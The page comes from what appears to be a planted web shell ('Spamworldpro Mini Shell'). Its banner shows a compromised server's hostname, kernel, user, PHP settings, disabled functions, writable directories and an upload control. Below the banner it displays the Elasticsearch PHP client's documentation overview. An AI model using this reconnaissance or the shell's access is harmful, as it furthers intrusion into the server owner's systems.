Spamworldpro Mini Shell
Spamworldpro


Server : Apache
System : Linux server2.corals.io 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Mon Nov 15 09:17:08 EST 2021 x86_64
User : corals ( 1002)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/corals/old/vendor/elasticsearch/elasticsearch/docs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/corals/old/vendor/elasticsearch/elasticsearch/docs/overview.asciidoc
[[overview]]
== Overview

This is the official PHP client for {es}. It is designed to be a low-level 
client that does not stray from the REST API.

All methods closely match the REST API, and furthermore, match the method 
structure of other language clients (Ruby, Python, and so on). We hope that this 
consistency makes it easy to get started with a client and to seamlessly switch 
from one language to the next with minimal effort.

The client is designed to be "unopinionated". There are a few universal niceties 
added to the client (cluster state sniffing, round-robin requests, and so on) 
but largely it is very barebones. This was intentional; we want a common base 
that more sophisticated libraries can build on top of.

* <<community_dsls>>
* <<community-integrations>>
* <<breaking_changes>>


include::community.asciidoc[]

include::breaking-changes.asciidoc[]

Spamworldpro Mini